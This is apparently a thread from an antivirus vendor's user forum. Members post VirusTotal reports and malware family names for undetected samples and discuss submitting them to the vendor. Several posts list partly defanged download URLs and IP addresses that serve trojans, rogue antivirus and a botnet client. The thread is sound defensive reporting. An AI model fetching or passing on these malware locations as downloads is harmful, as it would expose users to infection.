http://www.virustotal.com/file-scan/report.html?id=6de4790bccd91e52b9b37a8e06caf319a031e428348605abccf0b1edc163eff2-1291860389
http://www.virustotal.com/file-scan/report.html?id=ce3c29ec200ee7ada1f7d154e081da8e579396706b1f75084a2cf1679400933d-1291861361
http://www.virustotal.com/file-scan/report.html?id=9a87e02ce03c3b3a63e6ff6eb622e2d946e2e83c94d88e1919a03e85dfd269bb-1291733983
-
Trojan.PWS
http://www.virustotal.com/file-scan/report.html?id=ae5441f9e28cd942edf5676ef8d1785dc608a97db07f36d4510209aacf077554-1291871234
-
http://www.virustotal.com/file-scan/report.html?id=59d42bc32b357261fc3ea47f29f51d9265727c8fd94aa18ae7551fb5e55c15c3-1291782385
http://www.virustotal.com/file-scan/report.html?id=2cc896bed72cff170721a482bcd25947b42f7ec0e8eb26f9ec65d05570637b13-1291366141
http://www.virustotal.com/file-scan/report.html?id=30cf11bbb0320aadc50970c665a6dc28cc467917754265953ca033940b3338dc-1291889504
http://www.virustotal.com/file-scan/report.html?id=be3232ca3a7da061cba23e01ded366e29d778e4be155ad215179216c1cf1aecb-1291846308
http://www.virustotal.com/file-scan/report.html?id=25deec03dbfde34cb8c81c29edd126d96de82c781192245e9fd8f7aa2b8e6a05-1291915067
http://www.virustotal.com/file-scan/report.html?id=60bb23427e5848e7a361ada4e1ea44e7424a682d3d8c9d9c4f969bedb7cce4ae-1291912948
http://www.virustotal.com/file-scan/report.html?id=011837a42ae3ba6d56a2d8234a6c6d3723edb4e21fc66b1dab6472db8a5bdd8b-1291738956
http://www.virustotal.com/file-scan/report.html?id=c9f2d7076ef1d0bf794ed0d81bf694be7896cd60a44e61956e8d73a7cf11c7ba-1291912073
http://www.virustotal.com/file-scan/report.html?id=fcd07d46066bc332ec20f5514676f12e225f1ad08dee02c337cec960d30c9627-1291892540
-
nsm0220, are you submitting the samples to avast? (as it is mentioned in the first post of this thread)
-
yes
-
http://www.virustotal.com/file-scan/report.html?id=bec5e19f8784b9dd3f3c967b719950e9844c8dca9abf63c1dfabcec9f7f1bb21-1291929166
http://www.virustotal.com/file-scan/report.html?id=0b730cf2d3ff796a6bee6b31c291d9be582c28c9019de644a7d93f93f9e1d10f-1291934170
http://www.virustotal.com/file-scan/report.html?id=a8471195ded6bd0b325b0a8bdb99c82eed4bcafd9f4f6a006ae6ddb8eb6cee61-1291933796
http://www.virustotal.com/file-scan/report.html?id=ab96a70952980f010fea7f94221438851967c3e76d42f87bc5dd8683df325e1c-1291935563
http://www.virustotal.com/file-scan/report.html?id=2e565265aa5fa03f1b474ea5565f5917f07441f2dfeec1c72013861f90d37be2-1292148821
-
Trojan Dropper.
http://www.virustotal.com/file-scan/report.html?id=ab96a70952980f010fea7f94221438851967c3e76d42f87bc5dd8683df325e1c-1291957628
-
Not sure about this one.
0/43 on Virus Total:
http://www.virustotal.com/file-scan/report.html?id=5acddc9ce62ea190fe49abe84776a510412cb7c8c673cc59d2faf7ab16a7c2a5-1291960393
Uploaded it to VIPRES sandbox and it sure looks like Malware.
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=12070000&cs=0D04575BCE6EB3F61FB854915A1F44E3
MBAM finds it as Spyware.Passwords.XGen
-
Trojan.Scar. (MBAM)
http://www.virustotal.com/file-scan/report.html?id=4b505e12465fb5b4b554777a11af3dddb7cfcd9a493a76a9320baf85ede6463e-1292049114
Rogue A/V
http://www.virustotal.com/file-scan/report.html?id=703e9ef96679bc6e6fed691124404354f179dbead89cb2a4896ca4a2ec882079-1292050599
-
??? Is it a Trojan or Botnet
http://www.virustotal.com/file-scan/report.html?id=182119cb8d3e207b91503b5a8bc017c8cf9d2212e83d150ae565c8a06f8092f9-1292060165
-
http://www.virustotal.com/file-scan/report.html?id=a8e30a4da9360ec5350668beaf5e987d7ca60b0c7a68a4814daca11d62a4c99e-1292239430
http://www.virustotal.com/file-scan/report.html?id=b65bee8cd4630c7012823608e9edb43ae058742ab8c09c1a2c69aaf05fd4a697-1289835235
-
Rogue Antivirus.
http://www.virustotal.com/file-scan/report.html?id=15ef8b684b98e5d1f4cf966418e17e5e78f1ff4922c29e06cfd31f1bf0814e57-1292309253
Trojan.
http://www.virustotal.com/file-scan/report.html?id=25061e5c53335d11fd193121765c284406dc02a328e5d4a5f0e5ebe2a73c8a35-1292311973
Rogue Antivirus, Same name as above, but different MD5.
http://www.virustotal.com/file-scan/report.html?id=09af306edfe77eebba501fea6bc78edaff36844c333c3ec0af34270c572ffac2-1292394619
-
Every1 can make a keylogger with that program,similar to ardamax
http://www.virustotal.com/file-scan/report.html?id=4e413e6c5038348be3be70c5959baf579c91e2303eeadf42a1bbf8b020390d86-1292444613
thanks.
-
Worm.Win32.AutoRun.bnex
http://www.virustotal.com/file-scan/report.html?id=477104941154d0d3673365a7f59173743ec903be6b3dbf9cfebf959898a6bff4-1292359804
-
http://www.virustotal.com/file-scan/report.html?id=392070435000ec3c62cb705beebc964b84172d924af63c1d8cfc20eb2ffb0d25-1292349952
http://www.virustotal.com/file-scan/report.html?id=0299df68b2577a9171f8af95a8d62be69e5524d649822d5792e0b0d418f5c155-1292349980
-
http://www.virustotal.com/file-scan/report.html?id=aaee85f33c79f5457a7458a42cbd182de96d7b091f541547e09fa01c23b487dc-1292355698
-
TR/Crypt.XPACK.Gen. (Antivir)
http://www.virustotal.com/file-scan/report.html?id=378840167bc5675cce79371d8bbeffbf786e4367c50962a554dd06d41f6b21c1-1292563149
Trojan Zbot.
http://www.virustotal.com/file-scan/report.html?id=c854f743769e79d886107c9b5e02e306a51a065006c233374c819716f76f658e-1292568029
Rogue Antivirus.
http://www.virustotal.com/file-scan/report.html?id=01d2504452de747f7383b85a71b06fedce3b1bca32f0837d630cb3eb414bbd50-1292570480
-
Posting just for fun......not often i see a 100% score ;)
http://www.virustotal.com/file-scan/report.html?id=b6a17d16ee7db1bff201999f79f769fe7e4a6eacc5387437d8a5973457768961-1292540577
-
Posting just for fun......not often i see a 100% score ;)
http://www.virustotal.com/file-scan/report.html?id=b6a17d16ee7db1bff201999f79f769fe7e4a6eacc5387437d8a5973457768961-1292540577
I have a doubt of it ;D
-
Trojan-Ransom.
http://www.virustotal.com/file-scan/report.html?id=557f1bf993b4ddcff09a263ee8b72db52c903d207e5b0494ca7e3237e444f316-1292652859
Rogue Antivirus.
http://www.virustotal.com/file-scan/report.html?id=e9abf75ff9f28456d14f2e3e352b7c2048b33662a445c51d34b1f2990c8b1b48-1292655998
-
malware
http://www.virustotal.com/file-scan/report.html?id=fab272012d934f75915cd888f213e8857c390086363351eab3bf69f19ce67b65-1292708012
-
Rogue Antivirus.
http://www.virustotal.com/file-scan/report.html?id=7b6fe074ed8dcd8c4c4bb91447fb9fe721b4f867ec2eb19e591f6d15190d3ea3-1292825607
-
Trojan-Kazy Variant
Detected by Avast 5 but not 4.8.
http://www.virustotal.com/file-scan/report.html?id=2039251b594b50c65ce0a892df96e922959985b730875e9f244d51e3d83e32d1-1292830545
-
Trojan-Rogue Antivirus
http://www.virustotal.com/file-scan/report.html?id=cb45bb18b26dd2ab0fb63edb3e9cb516f1e65816fcbdf08274bb3168db399bae-1292909155
-
a variant of Win32/Injector.DYK
http://www.virustotal.com/file-scan/report.html?id=f0231cdd2c015de8b22974adf8c67977713749b9eec1e97dafe8450bb6e8f7de-1292905135
-
Win32/Spy.Banker.VCV
http://www.virustotal.com/file-scan/report.html?id=5be3687550fd58a96a483758232a18c1eed9220b73ccd168e7eec79adb088ccc-1292891741
-
Rogue Antivirus.
http://www.virustotal.com/file-scan/report.html?id=7b572d3a5695ec2df843a0fd4311cea65073895dd38de1296e85f4ac301bae45-1292992359
Trojan.Downloader.
http://www.virustotal.com/file-scan/report.html?id=2c89bf28901906e0878880ae507a2c68146d2ebc1028f91ec9285407fc92dfee-1292998812
-
Every1 can make a keylogger with that program,similar to ardamax
http://www.virustotal.com/file-scan/report.html?id=4e413e6c5038348be3be70c5959baf579c91e2303eeadf42a1bbf8b020390d86-1292444613
thanks.
still undetected?
-
Every1 can make a keylogger with that program,similar to ardamax
http://www.virustotal.com/file-scan/report.html?id=4e413e6c5038348be3be70c5959baf579c91e2303eeadf42a1bbf8b020390d86-1292444613
thanks.
still undetected?
Still have the program?
If yes, just send it again to VirusTotal... but at first look to the report on the quote seems a clean file.
-
Every1 can make a keylogger with that program,similar to ardamax
http://www.virustotal.com/file-scan/report.html?id=4e413e6c5038348be3be70c5959baf579c91e2303eeadf42a1bbf8b020390d86-1292444613
thanks.
still undetected?
Still have the program?
If yes, just send it again to VirusTotal... but at first look to the report on the quote seems a clean file.
i've already sent it,i said similar to ardamax.It's 100% malware
-
Rogue Antivirus.
http://www.virustotal.com/file-scan/report.html?id=7a34a2ee512dd374946c1f9cd2bcc0d173715ca258f8f9eab417b84cfd24158d-1293080954
Same name as I reported above, Different MD5
-
http://www.virustotal.com/file-scan/report.html?id=95fafaebced50b0fc4e3e14a197494ccaf73642ca1539c91e201e5c91863f9e1-1293136846
-
http://www.virustotal.com/file-scan/report.html?id=95fafaebced50b0fc4e3e14a197494ccaf73642ca1539c91e201e5c91863f9e1-1293136846
this file was in my computer and avast did not detect it
-
***
Did you send it to avast so that it could be detected??
***
-
Trojan Spyeye.
http://www.virustotal.com/file-scan/report.html?id=c0dec0a55b9270a331ac2dfc633c86175fd69b921a98d0d963a1397cbf15b5be-1293173674
Rootkit.
http://www.virustotal.com/file-scan/report.html?id=b70dd7caca08c9856d20e42962f388bc38d944a5803dc29dad3e301f77876e44-1293175215
-
Trojan downloader
http://www.virustotal.com/file-scan/report.html?id=a969f4f2bf5bc546659006f33b864933afd29064c88dc0987cb8f2b1d39dfba5-1284674539
Zbot / spyeye
http://www.virustotal.com/file-scan/report.html?id=fe8bfbea04126f2b26dda84cc4eeec3c4ac25435a1c8fd61854a8fb401d7d1c3-1287393580
-
Zbot / spyeye
http://www.virustotal.com/file-scan/report.html?id=fe8bfbea04126f2b26dda84cc4eeec3c4ac25435a1c8fd61854a8fb401d7d1c3-1287393580
Look here...
http://www.virustotal.com/file-scan/report.html?id=fe8bfbea04126f2b26dda84cc4eeec3c4ac25435a1c8fd61854a8fb401d7d1c3-1292058011
-
Zbot / spyeye
http://www.virustotal.com/file-scan/report.html?id=fe8bfbea04126f2b26dda84cc4eeec3c4ac25435a1c8fd61854a8fb401d7d1c3-1287393580
Look here...
http://www.virustotal.com/file-scan/report.html?id=fe8bfbea04126f2b26dda84cc4eeec3c4ac25435a1c8fd61854a8fb401d7d1c3-1292058011
eh, more up-to-date report mmm.
but this one:
http://www.virustotal.com/file-scan/report.html?id=da1c2b3807bfca9b29949442400bc8a68cac6a161feb49b648c729951ec629d6-1289874490
isn'tdetected by avast
-
Backdoor Trojan.
http://www.virustotal.com/file-scan/report.html?id=6f5e7a2092f6b4029c33e3df7ad5b34b165e47479c169f8ff8d6e41e67c08975-1293257481
Rogue Antivirus.
This is the third one with this name but different MD5.
http://www.virustotal.com/file-scan/report.html?id=cd8e3f8e48d829060a2e9ab1fb972272d631fd23f0d8526da0fa2993d08b7f5c-1293259721
Trojan Downloader.
http://www.virustotal.com/file-scan/report.html?id=48084612a4d111afceb5a557ea24dfd38a13bc27456f0b801953e7408f0258fe-1293262839
-
http://www.virustotal.com/file-scan/report.html?id=a76d913efcc776271b7ee7d233c49c6a3e107446b76cd8053814a869d6493614-1293259993
-
Trojan.
http://www.virustotal.com/file-scan/report.html?id=cf51f9c7bdfeff5e16ea92f8a9b24d5334208bd13ec69125e8b5b5a77b65bf07-1293338516
Trojan Dropper.
http://www.virustotal.com/file-scan/report.html?id=633b8d6a2125dd681fcc6e3b56e949edebb363f698d295cc8b1fda6677d51e26-1293340246
-
Trojan-Dropper.
http://www.virustotal.com/file-scan/report.html?id=9821eafcb0ca3984246cd0db26189f261516965751a1cb21f4b0950251423a93-1293426657
-
Trojan-GameThief.
http://www.virustotal.com/file-scan/report.html?id=e79a3a7ae2d2d9f171114c8eb31244e9125fca1841b9bd2378dce5773febbcee-1293600036
Trojan-Meredrop.
http://www.virustotal.com/file-scan/report.html?id=481eff7966fec5cde2da2558de947e8a3f7cdb4ea464feef732a40494c669113-1293602730
-
http://www.virustotal.com/file-scan/report.html?id=980048a34aeb00eb166c1002e655b5abc1a3f78172c761a6338fe43112d8b7f4-1293711830
Palevo?
-
Trojan.Zbot
http://www.virustotal.com/file-scan/report.html?id=fb68af03c0b0dc28c7b8541bacc0d5bba1988830620be01a201c5d0fb740314f-1293866103
-
Trojan-Downloader.
http://www.virustotal.com/file-scan/report.html?id=d9653d13d89bcc5ab915d53569c80eb6df2184662a62231c43febfbd28267d93-1293942862
Trojan Downloader #2
http://www.virustotal.com/file-scan/report.html?id=bd6065b3a2d2be4c4c09932c56dc5f3d8d03043d8beb03aff609c2a0d027b228-1293948578
-
Thanks Marc for helping improving detection.
Where are you getting that many samples? (you can PM me if you want) ;)
-
Sent you a PM.
-
Sent you a PM.
Thanks. Me too, with a third honeypot link.
-
Trojan.KillAV
http://www.virustotal.com/file-scan/report.html?id=23f5c8525b56f0fc94ff6acca872d6789352468619d4d4ade4989f2138911a23-1294030811
-
Trojan-Ransom.
http://www.virustotal.com/file-scan/report.html?id=6484329b4044f19355263bcbce4830fc93a125aa67f8445eae1459561fd866af-1294122041
-
FakeAV
http://www.virustotal.com/file-scan/report.html?id=f5b3b8959908d2de29ff34222b7ec7ae51e1f7c0634f6028f26c17250aa0c954-1294252989
-
http://www.virustotal.com/file-scan/report.html?id=2bf94a1599e80d51a2d9c9dca0caf48e96b17516dfe4408faa59128f3fa45775-1294415684
http://www.virustotal.com/file-scan/report.html?id=7afcf69d42a053208c0262569e81a7cad403eca066358f67e87717682a05a38c-1294417539
-
Rogue
http://www.virustotal.com/file-scan/report.html?id=bee575ab0030b49d32c268d85ada5534143d2894a9e5a928456fc5551a666d14-1294476920
-
http://www.virustotal.com/file-scan/report.html?id=9a062a3511623c42dc8e76c400f9b12fc3e57067a8073329cc1cef9d1d4886eb-1294435119
http://www.virustotal.com/file-scan/report.html?id=e06864809154e423b95acb73e39fb8959850c5e1a57f06594284085156fbdaab-1294440627
These samples detected now
-
http://www.virustotal.com/file-scan/report.html?id=1a524958890c08f3f2580d1a0d4bc62fc21ba5e90affd94575dad80bcaffc617-1294729202
-
http://www.virustotal.com/file-scan/report.html?id=89ab49432bc7d004da63eef88380594cb52a8918e493142213a033d08345d622-1294936404
-
http://www.virustotal.com/file-scan/report.html?id=b40e831b843bc7efb7baea32cc6451399c830901b9feab16c38762dd84423567-1294993303
-
http://www.virustotal.com/file-scan/report.html?id=36de61175198135ac1d6cb8a7e58e34b788ab7b7fdea6817b78f75ff5c0bd4b1-1294998458
Send to Avast! / 13.01.11 / 08:01 h.
With two other threats, they are added and it's not!
Why?
-
http://www.virustotal.com/file-scan/report.html?id=abe490ee1505982ea8b8cb680750bb0a17da0466942364287f6fc9df09559f8c-1295079421
http://www.virustotal.com/file-scan/report.html?id=e9771228be35876e8881db3cc515d4a84d271e525039fbebd3b7cf907c41b4f3-1295080564
http://www.virustotal.com/file-scan/report.html?id=b860908a0ce8e12db727691e418fb011feb3d925a9f96d09e0db9e3739b41593-1295081247
http://www.virustotal.com/file-scan/report.html?id=90f4d26a39c65d545ee8f048af9e21f08b0053a084c86f836cff89e362ac65c2-1295081684
http://www.virustotal.com/file-scan/report.html?id=4c25f1cd0a7e65f2dba1c32d99c8d0d5efdee7bc13f8d486c2983c71891647e0-1295082318
http://www.virustotal.com/file-scan/report.html?id=1aaa29e20cda6fc418f5c14f62d1703e882e9b9110b0b0b1a9c5c1cbc80253b4-1295083603
-
Autorun-Trojan
http://www.virustotal.com/file-scan/report.html?id=de2303914426964bcba26dc6d350d625b27665720f69d99c2001b71aee674142-1294996708
-
http://www.virustotal.com/file-scan/report.html?id=84b68fd5e08236f8dc1814542c1b288e9be2067e7d9d1445c22df5d2841c20ec-1295116584
-
http://www.virustotal.com/file-scan/report.html?id=7085183d7e8073b2d7419ed2d3bebae103e7cb3e8ae2edacc6f4f62fde7efa26-1295130264
http://xylibox.blogspot.com/2011/01/fake-kaspersky-site-host-ransomware.html
Sent to Avast
-
http://www.virustotal.com/file-scan/report.html?id=7085183d7e8073b2d7419ed2d3bebae103e7cb3e8ae2edacc6f4f62fde7efa26-1295130264
http://xylibox.blogspot.com/2011/01/fake-kaspersky-site-host-ransomware.html
Sent to Avast
Can you change http to hxxp. Thank you.
Bye Lep pozdrav ;)
-
Can you change http to hxxp. Thank you.
ehwhat, those links ain't malicious
-
Can you change http to hxxp. Thank you.
ehwhat, those links ain't malicious
+1
-
http://www.virustotal.com/file-scan/report.html?id=7085183d7e8073b2d7419ed2d3bebae103e7cb3e8ae2edacc6f4f62fde7efa26-1295279942
The threat was not added (
-
http://www.virustotal.com/file-scan/report.html?id=887bef6ec0076adedfca1923f3bc1dacef310b2f788f17de12cc3c400e04313e-1295645413
Please check this sample
-
KoenG, do you have that sample? Did you submit it to avast team?
Sure it is infected...
-
Also, check this
http://www.virustotal.com/file-scan/report.html?id=a32eccc3279782c89e491a3840a0cc9a269d88183514b9cd21f911c9062e2018-1278522524
http://www.virustotal.com/file-scan/report.html?id=1df1026a0aaa32d58514cd6bb75acd4e4275310144b980f2d2506f0f07f328fc-1295703326
-
The problem I have with this thread is that there is no follow up from anyone that is posting the links to Virustotal...
All it takes is for the person submitting the file to add it to the chest and scan it every couple of days, and when it is detected, simply edit the relevant post to say that it is now detected. Otherwise IMHO there is no point in just posting the links...
This is what I do if there is a sample that I have to submit (good or bad) leave a copy in the chest, and then scan it every couple of days, once it is detected/removed from detection then the file can go.
You can even add comments via the chest so that you can keep track of the file itself...
-
The problem I have with this thread is that there is no follow up from anyone that is posting the links to Virustotal...
They already posted they won't "follow" this thread... They would analyze the samples sent to them.
This is what I do if there is a sample that I have to submit (good or bad) leave a copy in the chest, and then scan it every couple of days, once it is detected/removed from detection then the file can go.
It would be a good think a track back from the user, yes.
-
The problem I have with this thread is that there is no follow up from anyone that is posting the links to Virustotal...
They already posted they won't "follow" this thread... They would analyze the samples sent to them.
Sorry, I didn't mean avast team, I meant those that post the links...
For instance, Marc57's post (http://forum.avast.com/index.php?topic=64122.msg577568#msg577568) (nothing against him, just an example of what I meant) according to VT, there is another report which shows avast! detects it. All it needs is for the user to edit, and say it is now detected. Otherwise we just have a bunch of useless links...
-
KoenG, do you have that sample? Did you submit it to avast team?
Sure it is infected...
No tech i have not this sample i copy/paste a VT report to the Avast Forum
from the VT site
The problem I have with this thread is that there is no follow up from anyone that is posting the links to Virustotal...
All it takes is for the person submitting the file to add it to the chest and scan it every couple of days, and when it is detected, simply edit the relevant post to say that it is now detected. Otherwise IMHO there is no point in just posting the links...
This is what I do if there is a sample that I have to submit (good or bad) leave a copy in the chest, and then scan it every couple of days, once it is detected/removed from detection then the file can go.
You can even add comments via the chest so that you can keep track of the file itself...
And sorry But is there not any following as a VT link posting on the avast forum
sorry for my bad english and for possibly
misunderstandings
And can everyone now back ontopic please
-
nice list
-
http://www.virustotal.com/file-scan/report.html?id=6de1250a22772eb6417e3e896961a3cc6e227b5eb781172d61ca8145c4018b7a-1296086845
-
http://www.virustotal.com/file-scan/report.html?id=fab272012d934f75915cd888f213e8857c390086363351eab3bf69f19ce67b65-1296108950
-
suspicious http://www.virustotal.com/file-scan/report.html?id=a8e30a4da9360ec5350668beaf5e987d7ca60b0c7a68a4814daca11d62a4c99e-1294314942
-
nice list
But a pretty pointless one as no one goes back and edits their posts when the malware sample is detected.
The links are of no use to avast, only physical samples can be analysed, so just send those to avast.
-
one more problem are
i have See real malware on virustotal links but ppl Say its goodware just for lure other ppl,
-
Are you really ready believe these anonymous people that you haven't a clue of their experience or intent, trust the weight of independent AV scanners rather anonymous comments.
-
Possible Java Malware:
http://www.virustotal.com/file-scan/report.html?id=ddfa23f9459b18b258f488fe0c06d66d5b7177e0f5325e72fde365df9ca8b30e-1297551741
http://camas.comodo.com/cgi-bin/submit?file=ddfa23f9459b18b258f488fe0c06d66d5b7177e0f5325e72fde365df9ca8b30e
MD5 : f780a5b1d533e3b906ba46d16e482fd8
Spirit.exe:
http://www.virustotal.com/file-scan/report.html?id=c8561e9b17c476344caadcfef70ce47d92c6c000261c549757457f4bfb190b7d-1297550795
http://camas.comodo.com/cgi-bin/submit?file=3751c585215f0f3126f0c761d6b314fd8634572ab09a9cf803d5cdc5393ffd3d
MD5 : 2b13ffc376f749f74a105a441f4a1517
-
Rogue Antivirus.
http://www.virustotal.com/file-scan/report.html?id=b3128a468a31dbb173bd8be9b62f57a739a367a72ff5b59d282c6eb26154c4e4-1297661465
-
Rogue Antivirus.
http://www.virustotal.com/file-scan/report.html?id=7781770a95896c5fb2ea83b9861ab99427a5f4da12dd67ffcacf56bdb4c249ea-1300597180
-
Good find, Marc57,
Avast also misses out on Palevo alias G bot a bit here: http://amada.abuse.ch/?search=91.217.162.24
Click the virustotal analysis there...and see for yourself
polonus
-
Rogue av called Clean this,clone of ThinkPoint and Palladium pro.
https://www.virustotal.com/file-scan/report.html?id=27eb412b15445b87ee8b35e419ce6147b69b4d623d6ce66a7993a331b8a0c708-1300519352
-
suspicious
http://www.virustotal.com/file-scan/report.html?id=190c6f801c134f32cba465e78d0a02efdf183dd8892514072a0505dd61a65be0-1300646017
suspicious
http://www.virustotal.com/file-scan/report.html?id=5cce92dc7ea0ba7f93b5f92bf2897a0697926bd3240e5f54237742a4d9fe84e4-1300646440
trojan
http://www.virustotal.com/file-scan/report.html?id=ce3b536fd55af6786370727ff47ed16ec7b285c26a197de35fb769772498cabf-1300647316
hotkeyshook
Why there is detection at all samples but not at this one (There should be HotKeysHook-I)
http://www.virustotal.com/file-scan/report.html?id=5fdb84a878575d3440a5f5600a6532a7ccc7bd0b401e9eb33c3af9843b977097-1300647461
-
danny96, did you submit the sample to avast? See #1 post of the thread.
-
danny96, did you submit the sample to avast? See #1 post of the thread.
It's not from my PC. Just looking at some trainers on website www.abecedaher.cz...
-
trojan h@tkeysh@@k.dll
http://www.virustotal.com/file-scan/report.html?id=0740e9df2dbb197a3b1a62be505ea2657673a5a4485815d56db7a56b9c874281-1300646150
(had this in computer - very danger)
Well, avast dedects it. Look at your VT link. ;)
-
trojan h@tkeysh@@k.dll
http://www.virustotal.com/file-scan/report.html?id=0740e9df2dbb197a3b1a62be505ea2657673a5a4485815d56db7a56b9c874281-1300646150
(had this in computer - very danger)
Well, avast dedects it. Look at your VT link. ;)
LOL sorry. But shouldn't be added detection for Avast! 4.8?
EDIT: Added next link
-
What is this TrjKrap.AZ? Not detected here as Win32:Malware-gen by avast: http://www.virustotal.com/url-scan/report.html?id=66c68e7cdb39871cf218bf320f42686b-1288938948
see file analysis: http://www.virustotal.com/file-scan/report.html?id=a5976124178be0ff7c864f3d74d36f372422bcca404d01697e6431f29dff8f9e-1288942583
Found here:
2011-03-20 20:28:31 htxp://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9 F0E35CDBDBB2B56003EFD859720BDFC7 184.85.147.191 US TrjKrap.AZ
2011-03-20 20:28:29 htxp://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7 F749BF47AB457E7F5670BE0B55C8DFA2 184.85.147.191 US TrjKrap.AZ
See: htxp://jsunpack.jeek.org/dec/go?report=fbe72914baadd9d253939dad06b0b5ccf98a8e56
Found benign: http://wepawet.iseclab.org/view.php?hash=d2b1b6a4068971379ab528362d3ae0b2&t=1300654385&type=js
But see: http://www.pandasecurity.com/homeusers/security-info/218557/Krap.AZ/
Should be detected by avast as Win32:Malware-gen,
polonus
-
Malicious Flash_Player_10.2_update_for_Win.exe not detected by avast as Win32:Renos variant...
see: http://www.virustotal.com/url-scan/report.html?id=48cb08b5fffd3b0c69f9662e2b1d8da5-1300651632
file analysis: http://www.virustotal.com/file-scan/report.html?id=8801fb51b54dc45069154d262135e1ddd77d2142aa8cb1a70e3e56bf3222d07b-1300655236
See: http://www.sophos.com/security/analyses/viruses-and-spyware/malfakeaviz.html?_log_from=rss
Also found to be suspicious here: http://wepawet.iseclab.org/view.php?hash=48cb08b5fffd3b0c69f9662e2b1d8da5&t=1300655461&type=js
Acompanying Anubis report here: http://anubis.iseclab.org/?action=result&task_id=1e47e25cfa4212b94d5c0dbfb942b6e07
polonus
-
This parasitic virus that infects Win32 PE executable files missed by avast, see: http://www.virustotal.com/url-scan/report.html?id=0fada3e4220ae5e9bb7e9a0f255115de-1300726070
file analysis: http://www.virustotal.com/url-scan/report.html?id=0fada3e4220ae5e9bb7e9a0f255115de-1300726070
= 2011-03-21 16:52:06 htxp://nutromchuu.co.cc/release/d2f0b5c46987429e2ad87a745a130a92/Internet-Explorer_update.exe 2D7307DCB9E615FFD1A28C3089F9CA4A 46 . 16. 240. 3 UA JSSality.AO
See: http://wepawet.iseclab.org/view.php?hash=0fada3e4220ae5e9bb7e9a0f255115de&t=1300729945&type=js (suspicious}
accompanying Anubis report to be found here: http://anubis.iseclab.org/?action=result&task_id=1cd3f576f2e1d72d4b1515c19f4c57216
see: htxp://jsunpack.jeek.org/dec/go?report=519636b9a472c69744b37908c41fe4409ab1c24c (this link only for experienced users)
polonus
-
Here this suspicious IRCBot malware was not detected. Resides here: 2011-03-13 01:49:03 hxtp://www.etoro.com/SDL/typeC/eToro1140.EXE AA34FA609C772A1A75960912A863E7AC 188. 95. 97. 212 NL PHPIRCBOT.CE
See url scan: http://www.virustotal.com/url-scan/report.html?id=58a3500d79093f8d48f351b8b2618894-1300739399
File analysis scan: http://www.virustotal.com/file-scan/report.html?id=6492099ee8a84d0a6e7c9152d44517444a8906244197a8453be52b29830c3311-1300743017
Suspicious: http://wepawet.iseclab.org/view.php?hash=58a3500d79093f8d48f351b8b2618894&t=1300743150&type=js
Anubis report: http://anubis.iseclab.org/?action=result&task_id=152b9df0e8a5515c4ed6a81498033f41c
Sig buster output: Wise_Installer vna SN:1361
another example of PHPIRCBOT.CE can be found here:
htxp://2gov.co.cc/pk2/ktytyvjlfli see for this: http://www.malware.pl/report/195.80.151.83
polonus
-
Rogue Installer.
http://www.virustotal.com/file-scan/report.html?id=dc6261c9d0b8d0f486ce55f8d191b96439007569df516087412cd3fb00462350-1301111394
-
Nice find, Marc57,
Good to give a couple of the resources where this malware is treated:
htxp://malc0de.com/database/index.php?search=KR&CC=on
Go there only if you are security aware enough and know what not to click and better even what not...
and then we will land here:
htxp://malc0de.com/database/index.php?search=vaccinescan_set (for experienced users only)
where we have 5 variants with ThreatExpert reports,
If we do a bit of reconaissance we see the malware site 124. 217. 218. 10 is down, so that makes the
find a bit more irrelevant. But there seems still activity from there:
htxp://down.rprotect.co.kr/rprotect/rpwacherh.dll
trojan fake-alert see: http://www.virustotal.com/latest-report.html?resource=f920958410f6ebaddfc9a1a4d66db082
Which avast naturally detects as Win32:Adware-gen
Do not visit that site, because it also infects with Win32:Virtob
see: http://www.virustotal.com/file-scan/report.html?id=9f1410c3796ddf9348f7a0bcc85a381b500d639b550918797f2abbd65e47a1d1-1299580539
So also neatly detected by good old avast, because we can only detect what is there,
and dead links or malware sites that have been brought down do not count...
But let us see if "vaccinescan_set_etc." resides somewhere else and is alive?
4 alive of 5 found at malware for domain search:
virustotal reports for the live ones are not very, very promishing,
so we see how important Marc57's posting was:
http://www.virustotal.com/file-scan/report.html?id=395feefcaa6ab9a02d489bbe03826e6df1bb6cda20087bc4dfec471341ddfa85-1300866728
&
http://www.virustotal.com/file-scan/report.html?id=8212515ad446410f6d47e9eae6eb4906fa9532b5e4952b28d843fd86b5dccfb5-1300853172
&
http://www.virustotal.com/file-scan/report.html?id=21b7dfcc8b2572ab78a30e4e7974a60998841c7d8ef7f746310d0813c6cdb445-1300853156
&
here detection is slightly better with 10 /42 (23.8%)
but avast misses it altogether:
http://www.virustotal.com/file-scan/report.html?id=bf12984f90b2c8afb8f3b5a5149eabc9c979a61736b2f414d444b6903a4135d3-1301117268
So sometimes it is worth delving a bit deeper with our cold renaissance methods,
polonus
-
Oh and just another thing, if you know where to look, you can even find some binairies for the malware that
Marc57 found, let's see, here: http://report.xandora.net/xangui/malware/view/efaeff5a90c6173b0b92d338b598f2f6
polonus
-
Here malware is residing at hxtp://cfteam.net/test/futurepack/tscplus.exe
Nice article on this malware can be found here:
http://www.offensivecomputing.net/?q=node/1448
See virustotal results here: http://www.virustotal.com/file-scan/report.html?id=84937ad73b04cf21c4bd9347ae4aeea578fe13db5cb8b7cae9fc72e1c0085ea2-1266518648
avast not detecting...
ThreatExpert report here: http://www.threatexpert.com/report.aspx?md5=b120c36aed67701358ad92e70f051820
Xandora does not have it yet, wepawet gives it as suspicious:
http://wepawet.iseclab.org/view.php?hash=1327791e62383cad70171e3ca315685e&t=1301178928&type=js
Anubis report: http://anubis.iseclab.org/?action=result&task_id=1e85aa90196fe77b41143c0da86cdd561&format=html
and look here: http://www.prevx.com/filenames/186858952724755476-X1/TSCPLUS.EXE.html
polonus
-
This zbot detection missed: http://www.virustotal.com/file-scan/report.html?id=28ef64ff922b12a8ecbe261f8046745f7f8ece9b8a1bfabf816984620a219436-1301236544
malware found to reside here:
htxp://rtfsti.com/fb/comments/facebook.update.utility.exe
See: http://info.prevx.com/aboutprogramtext.asp?PX5=3F9CD08D0002F9FB182F02B901BA7D0045ACED23
Here avast finds another variant:
http://www.virustotal.com/file-scan/report.html?id=81b65dd4f92fc29ba3f8062ed69fcb89a703e1c7d1ded2ff956aee11d5a2c0f1-1300555240
There is a lot of variety in this malware: (searched for W32/Pinkslipbot.gen.ae):
http://xandora.net/xangui/malware/search?by=name&keyword=W32%2FPinkslipbot.gen.ae
polonus
-
Rogue Installer.
